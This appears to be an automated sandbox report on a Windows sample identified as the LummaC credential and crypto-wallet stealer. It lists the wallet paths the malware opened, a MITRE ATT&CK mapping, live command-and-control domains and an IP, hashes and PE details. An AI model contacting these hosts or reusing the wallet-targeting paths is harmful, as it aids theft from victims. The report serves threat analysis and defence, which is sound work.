Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior

Source: Yara match	File source: 00000004.00000003.2079108699.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7120, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
External2.4.exe	53%	ReversingLabs	Win32.Spyware.Lummastealer

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://icyidentifysu.click/apiN	100%	Avira URL Cloud	malware
icyidentifysu.click	100%	Avira URL Cloud	malware
https://icyidentifysu.click/bui	100%	Avira URL Cloud	malware
https://icyidentifysu.click/api	100%	Avira URL Cloud	malware
http://hu.yamlhybull;hyphen;hyundaiiacute;id.yamlie.yamligrave;iiiint;iinfin;il.yamlim.yamlin.yamlin	0%	Avira URL Cloud	safe
https://icyidentifysu.click/pi	100%	Avira URL Cloud	malware
https://icyidentifysu.click/	100%	Avira URL Cloud	malware
https://icyidentifysu.click:443/api	100%	Avira URL Cloud	malware
https://icyidentifysu.click/bu	100%	Avira URL Cloud	malware
https://icyidentifysu.click/apigy	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
icyidentifysu.click	104.21.29.252	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
necklacebudi.lat	false		high
https://icyidentifysu.click/api	true	Avira URL Cloud: malware	unknown
aspecteirs.lat	false		high
energyaffai.lat	false		high
sustainskelet.lat	false		high
crosshuaht.lat	false		high
rapeflowwj.lat	false		high
grannyejh.lat	false		high
discokeyus.lat	false		high
icyidentifysu.click	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://icyidentifysu.click/apiN	BitLockerToGo.exe, 00000004.00000003.2118065257.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2156871633.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	BitLockerToGo.exe, 00000004.00000003.2052701545.0000000005439000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://icyidentifysu.click/	BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2079128879.0000000003191000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2079200625.000000000319A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://icyidentifysu.click/pi	BitLockerToGo.exe, 00000004.00000003.2118065257.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100856072.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100723310.00000000031A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/golang/protobuf/issues/1609):	External2.4.exe	false		high
https://icyidentifysu.click/bui	BitLockerToGo.exe, 00000004.00000003.2118065257.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2156871633.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	BitLockerToGo.exe, 00000004.00000003.2052701545.0000000005439000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	BitLockerToGo.exe, 00000004.00000003.2075101001.0000000005438000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075455011.0000000005438000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://hu.yamlhybull;hyphen;hyundaiiacute;id.yamlie.yamligrave;iiiint;iinfin;il.yamlim.yamlin.yamlin	External2.4.exe	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	BitLockerToGo.exe, 00000004.00000003.2005681459.000000000548F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005730334.0000000005488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	BitLockerToGo.exe, 00000004.00000003.2005681459.000000000548F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005730334.0000000005488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BitLockerToGo.exe, 00000004.00000003.2052414372.0000000005553000.00000004.00000800.00020000.00000000.sdmp	false		high
https://icyidentifysu.click/apigy	BitLockerToGo.exe, 00000004.00000003.2156871633.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	BitLockerToGo.exe, 00000004.00000003.2157105776.000000000317D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100893821.0000000003144000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2118301133.0000000003145000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2079128879.0000000003144000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2079536389.0000000003145000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2117608539.0000000003145000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2156907192.0000000003145000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100761942.0000000003132000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2152446703.0000000003145000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	BitLockerToGo.exe, 00000004.00000003.2075101001.0000000005438000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075455011.0000000005438000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 00000004.00000003.2052701545.0000000005439000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075101001.0000000005438000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075455011.0000000005438000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	BitLockerToGo.exe, 00000004.00000003.2005730334.0000000005465000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	BitLockerToGo.exe, 00000004.00000003.2005681459.000000000548F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	false		high
https://icyidentifysu.click/bu	BitLockerToGo.exe, 00000004.00000003.2156871633.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://icyidentifysu.click:443/api	BitLockerToGo.exe, 00000004.00000002.2157658912.0000000003111000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	BitLockerToGo.exe, 00000004.00000003.2005730334.0000000005465000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 00000004.00000003.2052414372.0000000005553000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	BitLockerToGo.exe, 00000004.00000003.2075101001.0000000005438000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075455011.0000000005438000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.29.252	icyidentifysu.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581520
Start date and time:	2024-12-27 23:57:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	External2.4.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 86% Number of executed functions: 29 Number of non-executed functions: 90
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target External2.4.exe, PID 6892 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: External2.4.exe

Simulations

Behavior and APIs

Time	Type	Description
17:58:31	API Interceptor	8x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.29.252	http://sharing.hs-sites.com/	Get hash	malicious	HTMLPhisher	Browse	sharing-exper-direct.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
icyidentifysu.click	Adobe GenP 5.exe	Get hash	malicious	LummaC	Browse	104.21.29.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Aura.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	104.26.13.205
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.30.13
	https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0	Get hash	malicious	Unknown	Browse	172.67.216.74
	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.30.13
	Installer.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	phish_alert_iocp_v1.4.48 - 2024-12-27T140703.193.eml	Get hash	malicious	Unknown	Browse	104.18.11.207
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	104.21.73.97

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Aura.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	Aura.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	Installer.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	Installer.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	NewSetup.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	ForcesLangi.exe	Get hash	malicious	LummaC	Browse	104.21.29.252

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.475648084107621
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	External2.4.exe
File size:	14'573'568 bytes
MD5:	97766c06578a790ff8f28baf21f70695
SHA1:	8668c33f6287e3e3898c4e3d4f2466595efa1644
SHA256:	6ab343da7ca47e43e789eb528dde342ecb8a86b914943adf5a4a7958248749e6
SHA512:	6e0b1f841c6885d0c3bd2b3ee37a42e91c912aca1f580c25fd443de772e01210f9a4f7638cc10d3eeab8189db7b421cbff110d91e0d1d29e344a71aa42817fbf
SSDEEP:	98304:Z+pGvPn+Btinz5dYBxpRgWu03PI3zwupVa4uKG1rh0CSk76h:waddYBx+Xc43G1rhoNh
TLSH:	A4E62851E9DB00F2DA0318344497627F77346A099F24CB87F54CBE7AEB33AE11936269
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t...............H`.........pd.......@....@.................................f.....@................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x466470
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	9cbefe68f395e67356e2a5d8d1b285c0

Entrypoint Preview

Instruction
jmp 00007F263CB70140h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov esi, eax
mov edx, dword ptr fs:[00000014h]
cmp edx, 00000000h
jne 00007F263CB72489h
mov eax, 00000000h
jmp 00007F263CB724E6h
mov edx, dword ptr [edx+00000000h]
cmp edx, 00000000h
jne 00007F263CB72487h
call 00007F263CB72579h
mov dword ptr [esp+20h], edx
mov dword ptr [esp+24h], esp
mov ebx, dword ptr [edx+18h]
mov ebx, dword ptr [ebx]
cmp edx, ebx
je 00007F263CB7249Ah
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], ebx
mov edi, dword ptr [ebx+1Ch]
sub edi, 28h
mov dword ptr [edi+24h], esp
mov esp, edi
mov ebx, dword ptr [ecx]
mov ecx, dword ptr [ecx+04h]
mov dword ptr [esp], ebx
mov dword ptr [esp+04h], ecx
mov dword ptr [esp+08h], edx
call esi
mov eax, dword ptr [esp+0Ch]
mov esp, dword ptr [esp+24h]
mov edx, dword ptr [esp+20h]
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], edx
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
mov edx, dword ptr [ecx]
mov eax, esp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xdc1000	0x3dc	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe2c000	0xe8f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdc2000	0x68d6e	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xca54e0	0xa0	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6046a5	0x604800	768f9fe365b9fd33825974018d940ed4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x606000	0x69de20	0x69e000	776c5ba7b94ba55e74f30084b82808a0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xca4000	0x11c0a1	0xcb600	79a4477aa80ab57cbee930ae80fbf1cd	False	0.6738725414874002	data	7.030383083520659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xdc1000	0x3dc	0x400	2bd71490c80401a45ef4bf94046284c9	False	0.4892578125	data	4.660637175689989	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xdc2000	0x68d6e	0x68e00	52532063b1e65e9a99ce682aad2fef58	False	0.4469490278605483	data	6.567380873793451	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xe2b000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xe2c000	0xe8f4	0xea00	43a06cadbbb70a895e62f525b3271131	False	0.16432959401709402	data	3.4970849084698634	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xe2c384	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0xe2cdec	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0xe2d454	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0xe2d73c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
